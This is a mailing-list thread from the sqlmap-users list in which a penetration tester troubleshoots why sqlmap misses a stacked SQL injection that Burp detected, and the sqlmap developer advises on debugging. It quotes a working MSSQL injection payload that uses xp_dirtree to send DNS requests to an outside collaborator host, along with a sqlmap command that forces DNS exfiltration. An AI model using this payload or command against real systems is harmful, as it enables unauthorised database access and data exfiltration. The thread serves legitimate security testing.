I would say that tool doesn't need to be improved with your case. Please
inspect what is going on by manually injecting testing payloads coming from
sqlmap (use for example -v 3).
I am pretty sure that something is wrong with your setup or the other end
is blocking some of requests.
Bye
On Tue, Dec 20, 2016 at 12:10 AM, Mark M. <vv...@hotmail.com> wrote:
> Right, that makes sense. But at the same time, this is a valid injection
> (I can reproduce it manually). Perhaps there's information I can provide
> to someone that would help improve the tool so it would catch this
> particular case and others like it?
>
>
> On Dec 19, 2016, at 5:04 PM, Miroslav Stampar <miroslav.stam...@gmail.com>
> wrote:
>
> As said, there should be at least one other SQLi technique available. In
> your case there is NONE. sqlmap will not blindly use dns-exfil if at least
> one other technique worked.
>
> Bye
>
> On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@hotmail.com> wrote:
>
>> Thanks, that's good advice. And I probably should post a little more
>> detail on what I'm running here so others can see it as well.
>>
>>
>> Here's the command executing:
>>
>>
>> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p
>> ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=
>> dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os
>> "Windows" --threads 1
>> ___
>> __H__
>> ___ ___[.]_____ ___ ___ {1.0.12#stable}
>> |_ -| . [)] | .'| . |
>> |___|_ [']_|_|_|__,| _|
>> |_|V |_| http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
>> mutual consent is illegal. It is the end user's responsibility to obey all
>> applicable local, state and federal laws. Developers assume no liability
>> and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 16:56:14
>>
>> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
>> [16:56:14] [INFO] setting up DNS server instance
>> custom injection marking character ('*') found in option
>> '--headers/--user-agent/--referer/--cookie'. Do you want to process it?
>> [Y/n/q] n
>> [16:56:16] [INFO] testing connection to the target URL
>> [16:56:18] [INFO] testing if the target URL is stable
>> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page
>> comparison on a sequence matcher. If no dynamic nor injectable parameters
>> are detected, or in case of junk results, refer to user's manual paragraph
>> 'Page comparison' and provide a string or regular expression to match on
>> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
>> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter
>> 'ProductCategory' might not be injectable
>> [16:56:23] [INFO] testing for SQL injection on GET parameter
>> 'ProductCategory'
>> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause (IN)'
>> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
>> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries
>> (comment)'
>> [16:56:39] [WARNING] time-based comparison requires larger statistical
>> model, please wait......... (done)
>> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind
>> (IF)'
>> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be
>> injectable
>> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable.
>> Try to increase '--level'/'--risk' values to perform more tests. Also, you
>> can try to rerun by providing either a valid value for option '--string'
>> (or '--regexp'). If you suspect that there is some kind of protection
>> mechanism involved (e.g. WAF) maybe you could retry with an option
>> '--tamper' (e.g. '--tamper=space2comment')
>> [16:58:03] [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 98 times
>>
>> [*] shutting down at 16:58:03
>>
>>
>>
>> And then, my capture results for DNS traffic:
>>
>>
>> root@bass:~# tcpdump -n -i eth0 udp port 53
>> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
>> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
>> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A?
>> www.testsite.org. (30)
>> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA?
>> www.testsite.org. (30)
>> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
>> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A?
>> www.testsite.org. (30)
>> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA?
>> www.testsite.org. (30)
>> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
>> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A?
>> www.testsite.org. (30)
>> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA?
>> www.testsite.org. (30)
>> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A?
>> www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA?
>> www.testsite.org. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A
>> 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
>> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A?
>> www.testsite.org. (30)
>> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA?
>> www.testsite.org. (30)
>> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
>> 173.213.231.200 (46)
>> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>>
>>
>> It doesn't seem like an injection pattern is being tried that is getting
>> the DNS exfiltration to occur... or else I'm doing something else wrong.
>>
>>
>> Thanks,
>>
>> V
>>
>> ------------------------------
>> *From:* Miroslav Stampar <miroslav.stam...@gmail.com>
>> *Sent:* Monday, December 19, 2016 4:10 PM
>> *To:* Mark M.
>> *Cc:* sqlmap-users@lists.sourceforge.net
>> *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil
>>
>> I would suggest you to run the wireshark or similar when running the
>> --dns-domain to properly debug what is going on. There could be really lots
>> of problems before you fine tune it (e.g. other service running on :53).
>>
>> About the "forcing" sqlmap for using dns-exfil. It will always at least
>> try to test it at the start of a run (if other injection technique
>> available). Also, it will prefer other "faster" techniques (ERROR and
>> UNION) over dns-exfil. However, there is a hidden switch "--force-dns"
>> which will force the usage of dns-exfil even if ERROR/UNION are available.
>>
>> As said, the best advice I can give to you is to run the wireshark during
>> the run and really see what is going on.
>>
>> Bye
>>
>> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@hotmail.com> wrote:
>>
>>> I have a situation where Burp has detected the following DNS
>>> exfiltration injection for a query parameter in a web app:
>>>
>>>
>>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20v
>>> archar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9
>>> fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.db
>>> o.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>>
>>>
>>> To make that a little easier to read, the injected value is:
>>>
>>>
>>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvp
>>> ngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree
>>> @q;--
>>>
>>>
>>> I've modified the domain and verified that I receive the DNS requests on
>>> my local DNS server (the domain which I provide to sqlmap using the
>>> --dns-domain=xxx option) when the injection is manually sent to the page.
>>> The problem is, when I pass the request to sqlmap it's not detecting that
>>> there's an injection at all. I've provided the OS/DBMS and --level 5, but
>>> still no dice. I'm using sqlmap v1.0.12#stable.
>>>
>>>
>>> Since I've gotten many other injections to work in the past, I believe
>>> that I'm using sqlmap properly (formatting my request in a file
>>> appropriately, specifying the correct parameter to test, etc.) However, it
>>> surprised me that what appeared to be a fairly straight-forward stacked SQL
>>> injection would slip by all of sqlmap's tests. Is there a way to force
>>> sqlmap to try DNS exfiltration injections despite no other injection
>>> technique succeeding?
>>>
>>>
>>> Thanks
>>>
>>> V
>>>
>>>
>>>
>>>
>>> ------------------------------------------------------------
>>> ------------------
>>> Developer Access Program for Intel Xeon Phi Processors
>>> Access to Intel Xeon Phi processor-based developer platforms.
>>> With one year of Intel Parallel Studio XE.
>>> Training and support from Colfax.
>>> Order your platform today.http://sdm.link/intel
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Developer Access Program for Intel Xeon Phi Processors
Access to Intel Xeon Phi processor-based developer platforms.
With one year of Intel Parallel Studio XE.
Training and support from Colfax.
Order your platform today.http://sdm.link/intel
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
